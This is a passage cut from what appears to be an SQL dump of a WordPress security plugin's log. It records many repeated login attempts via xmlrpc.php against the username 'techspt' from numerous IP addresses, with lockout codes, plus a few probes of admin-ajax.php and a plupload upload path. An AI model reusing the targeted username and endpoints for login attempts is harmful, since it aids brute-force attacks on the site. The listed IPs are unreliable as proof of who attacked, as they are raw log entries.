rpc.php',0,701,0),('178.62.105.205',2990434765,'techspt',0,1681614505.3993,152,'TWyi1BF8DeK5Lh3R0uEOmCka','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681614513.1401,152,'6AE7MyfoYBWuD0XiSq58Vh31','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'',0,1681614513.1464,10,'6AE7MyfoYBWuD0XiSq58Vh31','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('40.64.56.120',675297400,'techspt',0,1681614515.4379,152,'MJ49l1SdKCcUr7GOjFnQy0i2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.120.210.219',628675291,'techspt',0,1681615839.2722,152,'vugfsnrm7y6VdBRqLKe5ho0Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.187.251.91',3267099483,'techspt',0,1681617638.6288,152,'xzkd6UIvT81S0sPbH7ZWgiQK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.211',3091979731,'techspt',0,1681617680.4076,152,'daETj8Yytme3XC015ugGkSpl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.55',3326602039,'techspt',0,1681618243.3199,152,'rnZ4WYxVq2paNlSKXtgGyHeL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1681618243.3877,152,'08AsqEZN7HIVu6tFciL9o5vp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'techspt',0,1681618245.3545,152,'42kouGlqKUJbcTrDp6ndwaWI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('59.106.222.53',996859445,'techspt',0,1681618251.9864,152,'pg7CfL8tkJrv0e24EwZnTYoU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.62.161',804404897,'techspt',0,1681618259.8202,152,'r7d6K4UwP2CfB1AzNbjVDSxW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681618263.3326,152,'zf8odkqvC4GReDIlphbAwnjB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.132.254.35',864353827,'techspt',0,1681618265.2457,152,'GYLZN0XKlAROF6IucsUkCryW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'techspt',0,1681618275.2667,152,'DMZPsoIaLXiekthEbxcVglWN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681618284.1626,152,'KSPU9QLoTpWvngtNlwrIHfV6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681618284.9168,152,'v1flriHnZ9TSItL6QgUNxy0E','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.221.223.238',1742594030,'techspt',0,1681618288.9176,152,'y4YkjVXh2CL1v0dRoqiQFNxT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'techspt',0,1681618308.4079,152,'EilQuDofJVdTGP7Mwc4eq9rv','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'',0,1681618308.4107,10,'EilQuDofJVdTGP7Mwc4eq9rv','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('141.98.102.235',2372036331,'techspt',0,1681618906.9587,152,'gnVRmt0WF5yXiYdoa24lQ6w8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.225.138.200',1541507784,'techspt',0,1681620836.0150,152,'flKwxRVS0y1pBUbWsM6YQ7za','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('41.72.149.125',692622717,'techspt',0,1681620843.3854,152,'HETpaDnZ5eQ0NJ3YcgdIMl2v','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.171.90.148',1739283092,'techspt',0,1681620844.1480,152,'Sz5C1yJgxREf2oWjr39qDtFp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.36.174.113',908373617,'techspt',0,1681620849.3497,152,'qW2seCTcukPpIZYliORvBQt8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681620854.5687,152,'oP1B3bT6A4RVSnjmvc5FJuka','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.162.58.251',2342664955,'techspt',0,1681620858.4996,152,'8GjRI29sO0pKYSxqeaTiPJuL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681620865.7633,152,'tjlMmEuYTQbpLJO9hyBnzI6V','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.225.138.200',1541507784,'techspt',0,1681620869.1951,152,'TfDbldzoghBQkt9V85Ju6OW2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.225.138.200',1541507784,'',0,1681620869.1993,10,'TfDbldzoghBQkt9V85Ju6OW2','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('219.94.129.200',3680403912,'techspt',0,1681620871.6048,152,'P2mztnGuTVHOeQ73M9JNBvrc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.110.66.2',3111010818,'techspt',0,1681620881.2193,152,'YfcAB8ObCtSLZ7MpjidEGgxl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.27.163',1382423459,'techspt',0,1681623454.9555,152,'bVmcNYA71jxPpvi68Ek3aQUf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681625126.3840,152,'tLxwlFb1OVCu7BHq9KXsGvk5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.53.115',1556952435,'techspt',0,1681625129.9949,152,'ApgBnCServDOQVEdoiJ4XMxm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681625132.7413,152,'YpqvktEmBxQ23HIMTKRScGu8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('80.244.168.40',1358211112,'techspt',0,1681625139.5755,152,'STcGqOgQBnpIZvk1F5zPY9mx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681625140.8368,152,'cSmhspe0Z9dYz1ntxAQi5jkM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'techspt',0,1681625144.3325,152,'gHmTBJ04SyXlxwi5s6FKvGP9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'techspt',0,1681625151.1333,152,'x8WuoYty3P61qpHI0bgARBNl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'',0,1681625151.1393,10,'x8WuoYty3P61qpHI0bgARBNl','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.159.84.218',1738495194,'techspt',0,1681625151.1413,152,'MVnvkJPiNRzd3bUxsl4t5K8W','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('66.94.107.15',1113484047,'techspt',0,1681625156.6748,152,'9OPClNVcYAzvoSqMTX7dErJ1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681625157.1304,152,'ByZw4260leNvE7VrMULHgSnD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'',0,1681625157.1341,10,'ByZw4260leNvE7VrMULHgSnD','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.231.91.59',1743215419,'techspt',0,1681626411.8450,152,'LsGt3OU6A2ajMNBD7IX4FyHk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.207.254.152',1758461592,'techspt',0,1681627392.7588,152,'vJfWYIKQp35CiogrEDOGcVak','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('83.217.71.17',1406748433,'techspt',0,1681627398.8996,152,'HnyEO5f9QNxmXhslokIBzLpM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.230.17',2388518417,'techspt',0,1681627402.5288,152,'a0jAcdxq2QO8eytMrWGoCBFT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681627411.3548,152,'k2McqayjWUw1NbILzt07E5YP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681627414.7241,152,'CDwnJABZvfQs9zS7WUt5iPMg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.159.7.167',3583969191,'techspt',0,1681627419.2377,152,'ofRVqc2viC0T5S3XYZOIB41p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.6.142.143',1795591823,'techspt',0,1681627434.3819,152,'6dqkPhH5CS2lALwBRUXtnT1m','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('80.88.87.150',1347966870,'techspt',0,1681627435.7268,152,'FfKYSXpexiI90Tm4jCBqElth','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1681627437.4503,152,'0JCbi8DNQc9zyr5PvR6osVAH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.110.66.2',3111010818,'techspt',0,1681628806.5523,152,'Xps0ZrLI6W4TtgbGhR98wjnq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'techspt',0,1681628806.5534,152,'DwNuv4J31qVnHaGO7xfkpdIT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.109',3393054829,'techspt',0,1681628807.3579,152,'0tL58blofTu2JZNDiBQynsCk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681628813.1646,152,'zCxoQA5flMGTmiSkpVXEL2Hh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.169.144.135',1370067079,'techspt',0,1681628813.5777,152,'5FH6WiY0hUNduOATv3lraCck','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'techspt',0,1681628816.4832,152,'RIDnTbXhH36wKOF7y4A1g8q0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681628823.2797,152,'UxJyG9hsP64N8OSCdDBtKZVe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.2.5.90',3103917402,'techspt',0,1681628825.4726,152,'bfmgTyqzXBlvMLC8uGnH4QU5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.230.17',2388518417,'techspt',0,1681628831.1245,152,'0FMY62BevcikWuzSD1XLNCbf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.230.17',2388518417,'',0,1681628831.1301,10,'0FMY62BevcikWuzSD1XLNCbf','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('101.0.73.122',1694517626,'techspt',0,1681628833.8796,152,'W2946XkZbULCDBEz5thq7xQ8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681628836.7101,152,'qvahsXLfN1bciMzTmwkn6JUO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.190.132.194',1807647938,'techspt',0,1681628841.5769,152,'FV72h5SlwI1JBKgx9eniysQd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.32.187.122',2988489594,'techspt',0,1681631733.0160,152,'BvzMXyD0qNhb7sPWHTpfQU5l','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.222.62',1218960958,'techspt',0,1681631736.3494,152,'m9aRfV3WFS56PYky7vKAbdgh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.109.150.204',1047369420,'techspt',0,1681631739.4088,152,'dvfP8CNKJuZA7eE2rgTIhXip','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'techspt',0,1681631745.5236,152,'x6aGVfWJuPyFUQCI4Oe2nck9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681631746.4375,152,'qo0WVM6Jmpt9eIZvfA3j4aKr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('3.109.255.227',57540579,'techspt',0,1681631752.1968,152,'xXo7O15Uqwmg0yrJYCPcbNWT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('208.109.61.155',3496820123,'techspt',0,1681631756.9960,152,'wylkIuDmnVoz8xQh2F0qAb7G','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681631758.0495,152,'t1jw5dazgNEOXAcT307Y2FmW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.154.184.198',1738193094,'techspt',0,1681631759.8673,152,'V59S6ykbaxHfihCqNgjQ32Xe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.129.227.62',2508317502,'techspt',0,1681631761.1632,152,'MG5gu40dtyIp6FznresafTKR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681635490.8268,152,'jQFeRSbuJoHVx3w8PitdlfLz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.250.222.107',3355106923,'techspt',0,1681635491.3555,152,'i6tYRjgXJ4S7wl1IPGFZosxE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681635492.2274,152,'2MNfmtEc1VFroUb4y3JO5sBK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('116.118.49.117',1953902965,'techspt',0,1681635498.5202,152,'GjpuUr1KkBCXsic9fVDlNQbT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.37.121.239',908425711,'techspt',0,1681635505.4171,152,'813wKUVLiosdf7k92ThBvJtR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681635509.6215,152,'gyb7XILHGDCtqVmw2rs4eEWF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'techspt',0,1681635516.3615,152,'mpscPQaeJEH0LTt1SV9y6zCd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('125.227.111.133',2112057221,'techspt',0,1681635526.1703,152,'Qqe5jkU8OsXToArGJHYV2bm6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'techspt',0,1681635533.1248,152,'oWMCbnUTKjLwmf3lB7svYgVO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('139.162.58.251',2342664955,'techspt',0,1681637133.0639,152,'0Oc6ACFZPslBVo512jgWuwYm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.117.180.72',1735767112,'techspt',0,1681637133.3599,152,'qdC01KQXlYrtjp8RB2G9mVsD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681637134.4118,152,'t0lTeLYwKiRhxBgAW3zNjaCU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.54.126.2',3325459970,'techspt',0,1681637139.7601,152,'Np2lvagO786Xucd59CoxP3ni','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.31.87.110',3256833902,'techspt',0,1681637144.4633,152,'GiIdPmc87UJjDzVq563nNrKC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('183.181.91.159',3082115999,'techspt',0,1681637144.8449,152,'TXykR2fSnPvxq4VheIOpJEDo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.204.239.51',1556934451,'techspt',0,1681637156.5160,152,'KpSYVcJ5Gs3aI0QXA8NqUjob','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681637159.8494,152,'USmI8uJKCTcsMBAQ26Dvpyg0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681637161.8064,152,'tL7RqHwjs8zfDy0NYQOh2xVi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681637167.6345,152,'FDTuptxYydC1LP3fbIsUX0mv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.158',1046910110,'techspt',0,1681637367.7716,152,'1CcZTftlPewdAyzmLNkh9i7r','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.150',3115726998,'techspt',0,1681638680.9091,152,'30m4MGdF1JcfjQ6SgHZhBrpx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681638681.2841,152,'qVbNh9RUzsBOtSx06IjvceMi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.91.29.218',861609434,'techspt',0,1681638682.5618,152,'06DPmtWZa7Vu5gYfQ2sq14dC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.126.99.60',578708284,'techspt',0,1681638683.9256,152,'2T5WMQDloAKRhudZEJ6a0Nkc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('189.203.144.160',3184234656,'techspt',0,1681638691.8664,152,'ua0jdGlISisOWYKBhy5zRUef','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('41.193.5.58',700515642,'techspt',0,1681638704.8239,152,'Y98OR6BExc17rMPdIKThsWFo','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'techspt',0,1681638707.2717,152,'zW5oDj0EiymqBnK2lJ83ShR1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.159.84.218',1738495194,'techspt',0,1681638711.2232,152,'5vTLb4daMD7hnsrzu8B9q0pk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.117.180.72',1735767112,'techspt',0,1681638717.6832,152,'GYt0IuMvZ6S9gTf7WBPRw4KU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.117.180.72',1735767112,'',0,1681638717.6858,10,'GYt0IuMvZ6S9gTf7WBPRw4KU','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('43.155.103.11',731604747,'techspt',0,1681638718.2007,152,'ISwZFH37EjVUMph0Jr9OeX5Y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681638721.6222,152,'z10OENyxLMKu9rtopDsbh4AB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681641485.8410,152,'S0Wtiuv3nRCQV9dx2N5MIjPG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.204.239.51',1556934451,'techspt',0,1681641486.8636,152,'UvsoHAcFu8LlKZdbTtD2whgp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'techspt',0,1681641487.1950,152,'OewTloCfuRcx8V1NqrIPWjs9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681641490.6789,152,'ru3At7n6KVRJbWImTeUQZaOv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681641496.2543,152,'VhrPFDqogz1SGACMnufWTjtR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681641496.4500,152,'Tz3vtjWYeBNLCUD7VGXnlr6S','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'',0,1681641496.4566,10,'Tz3vtjWYeBNLCUD7VGXnlr6S','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('128.199.67.142',2160542606,'techspt',0,1681641507.8406,152,'ZUfGcluT8tBy2OP1rWFiE9bV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'',0,1681641507.8436,10,'ZUfGcluT8tBy2OP1rWFiE9bV','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('103.154.184.198',1738193094,'techspt',0,1681641508.0578,152,'UYVp1idbleLz3gINMO42WmAX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.104.167.76',795387724,'techspt',0,1681641508.6972,152,'FKJmthYWSwBUcXQ9sAP31bjZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.225.138.200',1541507784,'techspt',0,1681641514.2447,152,'1T6tBlKf4ywN7UxC2ISH8Lgd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.109',3393054829,'techspt',0,1681641518.5519,152,'0RDuNZAwnU81TIyfJogGadHX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.186.24',3583556120,'techspt',0,1681642269.4969,152,'hG4uAnHNyFgdtcJ5XmM8Io3k','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681642991.9280,152,'X6HNr9d8pKDMJgfiEa5B2U7A','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('184.75.221.203',3091979723,'techspt',0,1681643763.4586,152,'BgvuDyGjzpWaYfH4ZwUSx3eJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.171.90.148',1739283092,'techspt',0,1681644172.3346,152,'A7eEomUkYdK5a4iFyjWGnqvL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.138.169.247',2374674935,'techspt',0,1681644174.6306,152,'HQ3tuzkCal4XvqgmfncxSwOE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.233.41',1255205161,'techspt',0,1681644180.6599,152,'kAjBPqrShemiwVOIGl3XE2Nx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681644183.1815,152,'5jfzoh9V2MO3DvFTSy6sAWlN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681644185.9363,152,'4GZN2HUdsyiRwQ8MOuJXYjg6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'',0,1681644185.9392,10,'4GZN2HUdsyiRwQ8MOuJXYjg6','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('51.178.146.199',867340999,'techspt',0,1681644187.3837,152,'9AsDV6xCqaWTkOc8zUXuI7lJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('137.184.59.110',2310552430,'techspt',0,1681644191.5471,152,'ygoA0MuJz8kFVClUXbxwepIr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'',0,1681644195.1612,71,'bumEiQ1BKkr3cCoOlWnghAvX','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('149.248.50.72',2516070984,'techspt',0,1681644197.8399,152,'s3GuQ4pvCIEiLM0DP7KNbqFH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.38.131.186',220627898,'',0,1681644560.6474,55,'b5SVkZ7ptnI3XFWBK2YxjqHC','','19|0|0|0|cmdev-site1.com//cmdev-site1.com/wp-admin/admin-ajax.php',0,19,0),('13.38.131.186',220627898,'',0,1681644612.6624,55,'5Wkw4I3yFLeKR7ZhNX8gbaDO','','19|0|0|0|cmdev-site1.com//cmdev-site1.com/wp-admin/admin-ajax.php',0,19,0),('13.38.131.186',220627898,'',0,1681644612.6683,10,'5Wkw4I3yFLeKR7ZhNX8gbaDO','','707|0|0|0|cmdev-site1.com//cmdev-site1.com/wp-admin/admin-ajax.php',0,707,0),('81.21.253.29',1360395549,'techspt',0,1681647741.1448,152,'t9NPnwrMyVRBaugz4jk0mHOi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681647747.2923,152,'lS5dARUIstwocLaM3zGKiY9Z','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.186.168',3583556264,'techspt',0,1681648107.3314,152,'bzvqGY69l7nBseWHocagiCkR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.38.23.179',3257276339,'',0,1681648396.0117,55,'nJUDF1bitPWur0AYgC5hEjTZ','','19|0|0|0|cmdev-site1.com/public/plugins/plupload/examples/upload.php',0,19,0),('200.58.111.21',3359272725,'techspt',0,1681649712.0251,152,'OEFH4iV5QynC6dA1bSIhRLMx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.222.62',1218960958,'techspt',0,1681649722.5442,152,'M9ovdmgSELZIKW0HuYpz3Xwb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.242.255.46',804454190,'techspt',0,1681649723.1485,152,'JcSNHn83dD1ZiPwKIWhE2RaX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.136.247.142',2559113102,'techspt',0,1681649728.1475,152,'msEUc4z5wxfkTt7ohalB2nyu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.116.195.172',3111437228,'techspt',0,1681649740.6509,152,'QTAd6vFZM3x52VXUzh1Wb4ut','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.158.22.187',3281917627,'techspt',0,1681649741.7714,152,'dSkTt9urxYhb3EnclX7NM6vp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('88.214.28.5',1490426885,'techspt',0,1681649748.6956,152,'Yr7fmLKyhidS3UjWzDoswFM6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('109.94.209.234',1834930666,'',0,1681651924.9417,10,'eSAnJWcXLO6Ygo0iT2rfsNGy','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('185.182.56.150',3115726998,'techspt',0,1681651930.4215,152,'95AlO6nQxNZeRosYjC7Ttvim','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'techspt',0,1681651931.7979,152,'7ckurzfCdjMwADStvBRGLyJK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.232.58',2717968442,'techspt',0,1681651939.2070,152,'0QYPvV4W8UyItuXjoG7AOmEz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681651952.4737,152,'ZqV50wl84PxBhrzL9a76AGek','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.24.188.8',3625499656,'techspt',0,1681651952.7506,152,'Uwh6IQsuVB4RcyNOzge0TmLx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.50.2.67',1697776195,'techspt',0,1681651959.8505,152,'FR1kiB4TSHqWaO7l6MepxmEA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.24.188.8',3625499656,'techspt',0,1681651965.0587,152,'BtwqPCvZ4EVlnI59rRKgyTAS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.24.188.8',3625499656,'',0,1681651965.0634,10,'BtwqPCvZ4EVlnI59rRKgyTAS','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('198.71.235.55',3326602039,'techspt',0,1681651965.1627,152,'Ql1URO6KZFDfzNmB97u2IrSh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('87.101.92.171',1466260651,'techspt',0,1681652330.3106,152,'7VvDOQCtAo6